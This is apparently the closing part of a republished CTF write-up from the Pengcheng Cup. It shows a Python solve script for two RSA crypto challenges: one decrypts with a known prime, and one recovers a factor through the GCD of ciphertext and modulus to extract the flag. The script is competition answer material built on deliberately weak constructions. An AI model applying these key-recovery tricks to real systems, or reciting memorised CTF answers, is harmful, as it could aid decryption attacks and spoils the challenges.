# p = pbar + x0

# print("p: ", p)


p=119234372387564173916926418564504307771905987823894721284221707768770334474240277144999791051191061404002537779694672314673997030282474914206610847346023297970473719280866108677835517943804329212840618914863288766846702119011361533150365876285203805100986025166317939702179911918098037294325448226481818486521

e=0x10001


c=int('3a80caebcee814e74a9d3d81b08b1130bed6edde2c0161799e1116ab837424fbc1a234b9765edfc47a9d634e1868105d4458c9b9a0d399b870adbaa2337ac62940ade08daa8a7492cdedf854d4d3a05705db3651211a1ec623a10bd60596e891ccc7b9364fbf2e306404aa2392f5598694dec0b8f7efc66e94e3f8a6f372d833941a2235ebf2fc77c163abcac274836380045b63cc9904d9b13c0935040eda6462b99dd01e8230fdfe2871124306e7bca5b356d16796351db37ec4e574137c926a4e07a2bfe76b9cbbfa4b5b010d678804df3e2f23b4ec42b8c8433fa4811bf1dc231855bea4225683529fad54a9b539fe824931b4fdafab67034e57338217f', 16)

d = inverse(e,(p-1))

print(long_to_bytes(pow(c,d,p)))


c=int('1bd2a47a5d275ba6356e1e2bd10d6c870693be540e9318c746e807a7672f3a75cc63841170126d7dba52d7f6f9cf0f8dce9705fc1785cc670b2658b05d4b24d8918f95594844bfa920c8ffe73160c2c313b3fdbc4541ec19828165e34afa7d05271cc6fd59d08138b88c11677e6ac3b39cff525dcb19694b0388d895f53805a5e5bd8cfb947080e4855aaf83ebd85a397526f7d76d26031386900cb44a2e4bd121412bcee7a6c1e9af411e234f130e68a428596265d3ec647e50f65cb81393f4bd38389a2b9010fd715582506b9054dc235aced50757462b77a5606f116853af0c1ea3c7cf0d304f885d86081f8bac8b67b0625122f75448c5b6eb8f1cc8a0df', 16)

n=int('c2b17c86a8950f6dafe0a633890e4271cfb20c5ffda2d6b3d035afa655ed05ec16c67b18832ed887f2cea83056af079cc75c2ce43c90cce3ed02c2e07d256f240344f1734adeee6dc2b3b4bbf6dcfc68518d0a74e3e66f1865db95ef4204457e6471903c2321ac97f3b8e3d8d935896e9fc9145a30a3e24e7c320490a9944c1e94d301c8388445532699e6189f4aa6a86f67f1d9b8fb0de4225e005bd27594cd33e36622b2cd8eb2781f0c24d33267d9f29309158942b681aab81f39d1b4a73bd17431b46a89a0e4c2c58b1e24e850355c63b72392600d3fff7a16f6ef80ea515709da3ef1d28782882b0dd2f76bf609590db31979c5d1fd03f75d9d8f1c5069', 16)

p=GCD(c,n)

q=n//p

assert n%p==0

d = inverse(e,(p-1)*(q-1))

M = pow(c,d,n)

print(M%p==0)

m = (M // p ) // (2022*1011)

print(long_to_bytes(m))




 








原文始发于微信公众号(山石网科安全技术研究院):鹏城杯WriteUp | Pwn、密码、Reverse方向




 


 



    

  • 
左青龙

    • 

  • 微信扫一扫
    • 

  • 
weinxin

    • 



    

  • 
右白虎

    • 

  • 微信扫一扫
    • 

  • 
weinxin

    • 
























admin 
    

  • 本文由  发表于 2022年7月7日12:59:57
    • 

  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  
鹏城杯WriteUp | Pwn、密码、Reverse方向http://cn-sec.com/archives/1163727.html

    • 














 











 















发表评论

匿名网友
填写信息